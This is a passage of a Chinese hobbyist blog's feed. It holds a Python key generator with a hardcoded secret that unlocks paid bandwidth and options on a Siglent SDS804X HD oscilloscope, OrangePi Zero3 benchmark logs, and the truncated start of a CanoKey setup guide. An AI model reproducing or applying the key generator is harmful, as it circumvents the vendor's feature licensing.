<content type="html"><![CDATA[<h2 id="完成效果"><a href="#完成效果" class="headerlink" title="完成效果"></a>完成效果</h2><p>脚本来源: <a href="https://www.eevblog.com/forum/testgear/siglent-sds-sdg-hack-script/">https://www.eevblog.com/forum/testgear/siglent-sds-sdg-hack-script/</a><br>升级完成后型号会显示为SDS824X HD: </p><p><img src="/pictures/SDS804X-HD-Upgrade/1.png"> </p><hr><span id="more"></span> <h2 id="操作步骤"><a href="#操作步骤" class="headerlink" title="操作步骤"></a>操作步骤</h2><h3 id="1-示波器连好网线,配置网络:"><a href="#1-示波器连好网线,配置网络:" class="headerlink" title="1.示波器连好网线,配置网络:"></a>1.示波器连好网线,配置网络:</h3><p><img src="/pictures/SDS804X-HD-Upgrade/2.png"><br><img src="/pictures/SDS804X-HD-Upgrade/3.png"><br><img src="/pictures/SDS804X-HD-Upgrade/4.png"> </p><p>配网后的操作就可以不用在示波器的小屏幕上进行了。 </p><h3 id="2-打开SCPI页面"><a href="#2-打开SCPI页面" class="headerlink" title="2.打开SCPI页面"></a>2.打开SCPI页面</h3><p><img src="/pictures/SDS804X-HD-Upgrade/5.png"> </p><h3 id="3-修改并运行脚本"><a href="#3-修改并运行脚本" class="headerlink" title="3.修改并运行脚本"></a>3.修改并运行脚本</h3><figure class="highlight python"><figcaption><span>Python</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line"><span class="comment"># SCPI页面运行命令 MD5_SRLN? 获得SCOPEID</span></span><br><span class="line">SCOPEID = <span class="string">'0000000000000000'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 在 Home 页面找到SN进行替换</span></span><br><span class="line">SN = <span class="string">'SDS00000000000'</span></span><br><span class="line">Model = <span class="string">'SDS800X-HD'</span></span><br><span class="line"></span><br><span class="line">bwopt = (<span class="string">'70M'</span>, <span class="string">'100M'</span>, <span class="string">'200M'</span>)</span><br><span class="line">otheropt = (<span class="string">'PWA'</span>,)</span><br><span class="line"></span><br><span class="line">hashkey = <span class="string">'5zao9lyua01pp7hjzm3orcq90mds63z6zi5kv7vmv3ih981vlwn06txnjdtas3u2wa8msx61i12ueh14t7kqwsfskg032nhyuy1d9vv2wm925rd18kih9xhkyilobbgy'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">gen</span>(<span class="params">x</span>):</span><br><span class="line"> h = hashlib.md5((</span><br><span class="line"> hashkey +</span><br><span class="line"> (Model+<span class="string">'\n'</span>).ljust(<span class="number">32</span>, <span class="string">'\x00'</span>) +</span><br><span class="line"> opt.ljust(<span class="number">5</span>, <span class="string">'\x00'</span>) +</span><br><span class="line"> <span class="number">2</span>*(((SCOPEID <span class="keyword">if</span> opt <span class="keyword">in</span> bwopt <span class="keyword">else</span> SN) + <span class="string">'\n'</span>).ljust(<span class="number">32</span>, <span class="string">'\x00'</span>)) + <span class="string">'\x00'</span>*<span class="number">16</span>).encode(<span class="string">'ascii'</span>)</span><br><span class="line"> ).digest()</span><br><span class="line"> key = <span class="string">''</span></span><br><span class="line"> <span class="keyword">for</span> b <span class="keyword">in</span> h:</span><br><span class="line"> <span class="keyword">if</span> (b <= <span class="number">0x2F</span> <span class="keyword">or</span> b > <span class="number">0x39</span>) <span class="keyword">and</span> (b <= <span class="number">0x60</span> <span class="keyword">or</span> b > <span class="number">0x7A</span>):</span><br><span class="line"> m = b % <span class="number">0x24</span></span><br><span class="line"> b = m + (<span class="number">0x57</span> <span class="keyword">if</span> m > <span class="number">9</span> <span class="keyword">else</span> <span class="number">0x30</span>)</span><br><span class="line"> <span class="keyword">if</span> b == <span class="number">0x30</span>:</span><br><span class="line"> b = <span class="number">0x32</span></span><br><span class="line"> <span class="keyword">if</span> b == <span class="number">0x31</span>:</span><br><span class="line"> b = <span class="number">0x33</span></span><br><span class="line"> <span class="keyword">if</span> b == <span class="number">0x6c</span>:</span><br><span class="line"> b = <span class="number">0x6d</span></span><br><span class="line"> <span class="keyword">if</span> b == <span class="number">0x6f</span>:</span><br><span class="line"> b = <span class="number">0x70</span></span><br><span class="line"> key += <span class="built_in">chr</span>(b)</span><br><span class="line"> <span class="keyword">return</span> key.upper()</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">'--------------------------------'</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">'\n'</span>)</span><br><span class="line"><span class="keyword">for</span> opt <span class="keyword">in</span> bwopt:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">'{:5} {}'</span>.<span class="built_in">format</span>(opt, gen(SCOPEID)))</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">'\n'</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">'--------------------------------'</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">'\n'</span>)</span><br><span class="line"><span class="keyword">for</span> opt <span class="keyword">in</span> otheropt:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">'{:5} {}'</span>.<span class="built_in">format</span>(opt, gen(SN)))</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="4-升级带宽"><a href="#4-升级带宽" class="headerlink" title="4.升级带宽"></a>4.升级带宽</h3><p>注:在向SCPI页面输入任何脚本生成的激活码前,先运行命令<code>MCBD?</code>查询当先带宽的激活码(一般为70M的),核对与脚本生成的70M的激活码是否一致,不一致就先检查脚本中的<code>SCOPEID</code>,<code>SN</code>输入是否正确。 </p><p>SCPI页面运行命令 <code>MCBD 带宽激活码</code> 例如:<code>MCBD 6M5VE9723IR5RACG</code></p><h3 id="5-解锁选件"><a href="#5-解锁选件" class="headerlink" title="5.解锁选件"></a>5.解锁选件</h3><p>注:示波器固件升级到 1.1.3.8 版本后,FG(USB波形发生器)和16LA(16通逻辑分析仪)这两个需要买额外硬件的选件成标配了,不需要手动激活。<br><img src="/pictures/SDS804X-HD-Upgrade/6.png"> </p><p>全部操作完成后重启。</p>]]></content>
<summary type="html"><h2 id="完成效果"><a href="#完成效果" class="headerlink" title="完成效果"></a>完成效果</h2><p>脚本来源: <a href="https://www.eevblog.com/forum/testgear/siglent-sds-sdg-hack-script/">https://www.eevblog.com/forum/testgear/siglent-sds-sdg-hack-script/</a><br>升级完成后型号会显示为SDS824X HD: </p>
<p><img src="/pictures/SDS804X-HD-Upgrade/1.png"> </p>
<hr></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>OrangePi Zero3 CPU跑分测试 CPU Benchmark</title>
<link href="https://thinkalone.win/OrangePiZero3-CPU-Benchmark.html"/>
<id>https://thinkalone.win/OrangePiZero3-CPU-Benchmark.html</id>
<published>2025-02-01T04:00:00.000Z</published>
<updated>2025-02-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<p>CPU:H618<br>RAM:2G </p><p>screenfetch </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@Zero3</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P"" """Y$$.". Kernel: aarch64 Linux 6.6.75-current-sunxi64</span><br><span class="line"> ,$$P' `$$$. Uptime: 11d 6h 33m</span><br><span class="line">',$$P ,ggs. `$$b: Packages: 442</span><br><span class="line">`d$$' ,$P"' . $$$ Shell: bash</span><br><span class="line"> $$P d$' , $$P Disk: 2.0G / 58G (4%)</span><br><span class="line"> $$: $$. - ,d$$' CPU: ARM Cortex-A53 @ 4x 1.512GHz</span><br><span class="line"> $$\; Y$b._ _,d$P' RAM: -</span><br><span class="line"> Y$$. `.`"Y$$$$P"'</span><br><span class="line"> `$$b "-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `"Y$b._</span><br><span class="line"> `""""</span><br><span class="line"></span><br></pre></td></tr></table></figure><span id="more"></span><p>7-zip 16.02:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Zero3:~$ 7z b -mmt4</span><br><span class="line"></span><br><span class="line">7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: - - - - - 256000000 - 1024000000 -</span><br><span class="line"></span><br><span class="line">RAM size: 1918 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 882 MB, # Benchmark threads: 4</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 2339 340 669 2276 | 52855 398 1132 4509</span><br><span class="line">23: 2201 347 647 2243 | 51734 398 1124 4476</span><br><span class="line">24: 2097 355 636 2256 | 49812 398 1099 4373</span><br><span class="line">25: 2014 364 631 2300 | 48705 398 1088 4335</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 351 646 2269 | 398 1111 4423</span><br><span class="line">Tot: 375 878 3346</span><br><span class="line">disappear9@Zero3:~$ 7z b -mmt1</span><br><span class="line"></span><br><span class="line">7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21</span><br><span class="line">p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs LE)</span><br><span class="line"></span><br><span class="line">LE</span><br><span class="line">CPU Freq: 64000000 64000000 - - - 256000000 - 1024000000 -</span><br><span class="line"></span><br><span class="line">RAM size: 1918 MB, # CPU hardware threads: 4</span><br><span class="line">RAM usage: 435 MB, # Benchmark threads: 1</span><br><span class="line"></span><br><span class="line"> Compressing | Decompressing</span><br><span class="line">Dict Speed Usage R/U Rating | Speed Usage R/U Rating</span><br><span class="line"> KiB/s % MIPS MIPS | KiB/s % MIPS MIPS</span><br><span class="line"></span><br><span class="line">22: 914 100 890 890 | 16813 100 1436 1436</span><br><span class="line">23: 868 100 885 884 | 16460 100 1425 1425</span><br><span class="line">24: 831 100 894 894 | 16095 100 1413 1413</span><br><span class="line">25: 790 100 902 902 | 15692 100 1397 1397</span><br><span class="line">---------------------------------- | ------------------------------</span><br><span class="line">Avr: 100 893 893 | 100 1418 1418</span><br><span class="line">Tot: 100 1155 1155</span><br></pre></td></tr></table></figure><p>phoronix-test-suite benchmark compress-7zip</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Zero3:~/phoronix-test-suite$ ./phoronix-test-suite benchmark compress-7zip</span><br><span class="line"></span><br><span class="line">Phoronix Test Suite v10.8.4</span><br><span class="line"></span><br><span class="line"> To Install: pts/compress-7zip-1.11.0</span><br><span class="line"></span><br><span class="line">System Information</span><br><span class="line"></span><br><span class="line"> PROCESSOR: ARMv8 Cortex-A53 @ 1.51GHz</span><br><span class="line"> Core Count: 4</span><br><span class="line"> Scaling Driver: cpufreq-dt ondemand</span><br><span class="line"></span><br><span class="line"> GRAPHICS:</span><br><span class="line"></span><br><span class="line"> MOTHERBOARD: OrangePi Zero3</span><br><span class="line"></span><br><span class="line"> MEMORY: 2048MB</span><br><span class="line"></span><br><span class="line"> DISK: 62GB SE064</span><br><span class="line"> File-System: ext4</span><br><span class="line"> Mount Options: commit=120 errors=remount-ro noatime rw</span><br><span class="line"> Disk Details: Block Size: 4096</span><br><span class="line"></span><br><span class="line"> OPERATING SYSTEM: Debian 12</span><br><span class="line"> Kernel: 6.6.75-current-sunxi64 (aarch64)</span><br><span class="line"> Compiler: GCC 12.2.0</span><br><span class="line"> Security: gather_data_sampling: Not affected</span><br><span class="line"> + itlb_multihit: Not affected</span><br><span class="line"> + l1tf: Not affected</span><br><span class="line"> + mds: Not affected</span><br><span class="line"> + meltdown: Not affected</span><br><span class="line"> + mmio_stale_data: Not affected</span><br><span class="line"> + reg_file_data_sampling: Not affected</span><br><span class="line"> + retbleed: Not affected</span><br><span class="line"> + spec_rstack_overflow: Not affected</span><br><span class="line"> + spec_store_bypass: Not affected</span><br><span class="line"> + spectre_v1: Mitigation of __user pointer sanitization</span><br><span class="line"> + spectre_v2: Not affected</span><br><span class="line"> + srbds: Not affected</span><br><span class="line"> + tsx_async_abort: Not affected</span><br><span class="line"></span><br><span class="line">Current Description: ARMv8 Cortex-A53 testing on Debian 12 via the Phoronix Test Suite.</span><br><span class="line"></span><br><span class="line">7-Zip Compression 24.05:</span><br><span class="line"> pts/compress-7zip-1.11.0</span><br><span class="line"> Test 1 of 1</span><br><span class="line"> Estimated Trial Run Count: 3</span><br><span class="line"> Estimated Time To Completion: 17 Minutes</span><br><span class="line"> Started Run 1</span><br><span class="line"> Started Run 2</span><br><span class="line"> Started Run 3</span><br><span class="line"></span><br><span class="line"> Test: Compression Rating:</span><br><span class="line"> 2688</span><br><span class="line"> 2667</span><br><span class="line"> 2656</span><br><span class="line"></span><br><span class="line"> Average: 2670 MIPS</span><br><span class="line"> Deviation: 0.61%</span><br><span class="line"></span><br><span class="line"> Test: Decompression Rating:</span><br><span class="line"> 4757</span><br><span class="line"> 4737</span><br><span class="line"> 4741</span><br><span class="line"></span><br><span class="line"> Average: 4745 MIPS</span><br><span class="line"> Deviation: 0.22%</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ARMv8 Cortex-A53 testing on Debian 12 via the Phoronix Test Suite.</span><br><span class="line"></span><br><span class="line"> Processor: ARMv8 Cortex-A53 @ 1.51GHz (4 Cores), Motherboard: OrangePi Zero3, Memory: 2048MB, Disk: 62GB SE064</span><br><span class="line"></span><br><span class="line"> OS: Debian 12, Kernel: 6.6.75-current-sunxi64 (aarch64), Compiler: GCC 12.2.0, File-System: ext4</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> 7-Zip Compression 24.05</span><br><span class="line"> Test: Compression Rating</span><br><span class="line"> MIPS > Higher Is Better</span><br><span class="line"> Zero3 . 2670</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> 7-Zip Compression 24.05</span><br><span class="line"> Test: Decompression Rating</span><br><span class="line"> MIPS > Higher Is Better</span><br><span class="line"> Zero3 . 4745</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>sysbench </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">disappear9@Zero3:~$ sysbench cpu --cpu-max-prime=20000 --threads=4 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 4</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 1124.46</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0030s</span><br><span class="line"> total number of events: 11254</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 3.35</span><br><span class="line"> avg: 3.55</span><br><span class="line"> max: 10.86</span><br><span class="line"> 95th percentile: 4.25</span><br><span class="line"> sum: 40002.45</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 2813.5000/0.50</span><br><span class="line"> execution time (avg/stddev): 10.0006/0.00</span><br><span class="line"></span><br><span class="line">disappear9@Zero3:~$ sysbench cpu --cpu-max-prime=20000 --threads=1 run</span><br><span class="line">sysbench 1.0.20 (using system LuaJIT 2.1.0-beta3)</span><br><span class="line"></span><br><span class="line">Running the test with following options:</span><br><span class="line">Number of threads: 1</span><br><span class="line">Initializing random number generator from current time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Prime numbers limit: 20000</span><br><span class="line"></span><br><span class="line">Initializing worker threads...</span><br><span class="line"></span><br><span class="line">Threads started!</span><br><span class="line"></span><br><span class="line">CPU speed:</span><br><span class="line"> events per second: 294.62</span><br><span class="line"></span><br><span class="line">General statistics:</span><br><span class="line"> total time: 10.0007s</span><br><span class="line"> total number of events: 2948</span><br><span class="line"></span><br><span class="line">Latency (ms):</span><br><span class="line"> min: 3.35</span><br><span class="line"> avg: 3.39</span><br><span class="line"> max: 10.65</span><br><span class="line"> 95th percentile: 3.36</span><br><span class="line"> sum: 9998.34</span><br><span class="line"></span><br><span class="line">Threads fairness:</span><br><span class="line"> events (avg/stddev): 2948.0000/0.00</span><br><span class="line"> execution time (avg/stddev): 9.9983/0.00</span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>CPU:H618<br>RAM:2G </p>
<p>screenfetch </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> _,met$$$$$gg. disappear9@Zero3</span><br><span class="line"> ,g$$$$$$$$$$$$$$$P. OS: Debian 12 bookworm</span><br><span class="line"> ,g$$P&quot;&quot; &quot;&quot;&quot;Y$$.&quot;. Kernel: aarch64 Linux 6.6.75-current-sunxi64</span><br><span class="line"> ,$$P&#x27; `$$$. Uptime: 11d 6h 33m</span><br><span class="line">&#x27;,$$P ,ggs. `$$b: Packages: 442</span><br><span class="line">`d$$&#x27; ,$P&quot;&#x27; . $$$ Shell: bash</span><br><span class="line"> $$P d$&#x27; , $$P Disk: 2.0G / 58G (4%)</span><br><span class="line"> $$: $$. - ,d$$&#x27; CPU: ARM Cortex-A53 @ 4x 1.512GHz</span><br><span class="line"> $$\; Y$b._ _,d$P&#x27; RAM: -</span><br><span class="line"> Y$$. `.`&quot;Y$$$$P&quot;&#x27;</span><br><span class="line"> `$$b &quot;-.__</span><br><span class="line"> `Y$$</span><br><span class="line"> `Y$$.</span><br><span class="line"> `$$b.</span><br><span class="line"> `Y$$b.</span><br><span class="line"> `&quot;Y$b._</span><br><span class="line"> `&quot;&quot;&quot;&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure></summary>
<category term="测试结果" scheme="https://thinkalone.win/categories/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
<category term="杂项" scheme="https://thinkalone.win/tags/%E6%9D%82%E9%A1%B9/"/>
<category term="测试结果" scheme="https://thinkalone.win/tags/%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9E%9C/"/>
</entry>
<entry>
<title>Canokey Canary上手</title>
<link href="https://thinkalone.win/canokey-canary.html"/>
<id>https://thinkalone.win/canokey-canary.html</id>
<published>2025-01-01T04:00:00.000Z</published>
<updated>2026-02-01T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h3><p>第一次接触Canokey还是在2021年,当时跟风买了CanoKey Pigeon首发,到手以后把GPG密钥塞进去再加到几个网站做认证器以后就一直是半吃灰状态,毕竟网站的登录不会天天掉,而GPG更是一万年没人给我发加密的信息,连用来git签名的次数都少(我懒)。 </p><p>前段Canokey群抽奖送Canary测试版,本人有幸中得一个:<br><img src="/pictures/canokey-canary/1.png"> </p><p>那这不再折腾一下似乎就有点不合适了。 </p><hr><h3 id="环境确认"><a href="#环境确认" class="headerlink" title="环境确认"></a>环境确认</h3><p>硬件信息:<br>  CanoKey Canary(3.0.0-rc2-0 dirty build)<br>操作系统:<br>  Windows 10 LTSB 21H2<br>软件版本:<br>  gpg4win 4.4 (gpg 2.4.7)<br>  OpenSC 0.26.0 </p><span id="more"></span> <p>Canokey的功能主要有这几大块: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">WebAuthn (Passkey)</span><br><span class="line">OTP</span><br><span class="line">OpenPGP</span><br><span class="line">PIV</span><br></pre></td></tr></table></figure><p>我们分别来介绍怎么玩(也是给自己留个备忘)。 </p><h3 id="WebAuthn-Passkey"><a href="#WebAuthn-Passkey" class="headerlink" title="WebAuthn (Passkey)"></a>WebAuthn (Passkey)</h3><p><img src="/pictures/canokey-canary/2.png"> </p><p>然后就可以开始用作网站登录的认证了,这里不再赘述。 </p><h4 id="SSH-FIDO"><a href="#SSH-FIDO" class="headerlink" title="SSH FIDO"></a>SSH FIDO</h4><p>参考<a href="https://docs.canokeys.org/zh-hans/userguide/ctap/">WebAuthn (Passkey)</a><br>所有命令均在PowerShell中运行<br>确保安装的 OpenSSH 为 8.2 及以上版本 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh -V</span><br><span class="line">sshd -V</span><br></pre></td></tr></table></figure><p>本人测试过在当前环境下只有 Discoverable Credential(Resident Key)是可用的,non-discoverable credentials无论是使用 Windows 自带的 SSH 还是用 <a href="https://github.com/tetractic/SK-SSH-Agent">SK SSH Agent</a> 转发均无法使用,原因未知,请不吝赐教。<br>除此以外还有一个魔改版putty:<a href="https://github.com/NoMoreFood/putty-cac">putty-cac</a> 本人没有测试过。<br>由于本人并不常用Windows自带的SSH连接服务器,而且开SK SSH Agent还会占用Agent的端口,所以本人日常用的方案是下文中的 SSH with gpg agent,这里只是简单试试。 </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -t ed25519-sk -O resident</span><br></pre></td></tr></table></figure><p>将生成的公钥文件 <code>~/.ssh/id_ed25519_sk.pub</code> 中的内容添加到目标服务器的 <code>authorized_keys</code> 文件中。<br>然后直接使用 Windows 自带的 SSH 或者开 SK SSH Agent 加载 <code>~/.ssh/id_ed25519_sk</code> 后就可以使用了。 </p><h3 id="OTP"><a href="#OTP" class="headerlink" title="OTP"></a>OTP</h3><p><strong>建议是别用</strong><br>推荐使用 KeePass + KeeTrayTOTP 插件,或手机上的<a href="https://play.google.com/store/apps/details?id=com.stratumauth.app">Stratum - Authenticator App</a> (<a href="https://github.com/stratumauth/app">https://github.com/stratumauth/app</a>) </p><h3 id="OpenPGP"><a href="#OpenPGP" class="headerlink" title="OpenPGP"></a>OpenPGP</h3><p>参考<a href="https://editst.com/2022/canokey-guide/#OpenPGP">Canokey 指南:OTP,FIDO2,PGP 与 PIV</a><br>所有命令均在PowerShell中运行 </p><h4 id="1-生成主密钥"><a href="#1-生成主密钥" class="headerlink" title="1.生成主密钥"></a>1.生成主密钥</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span 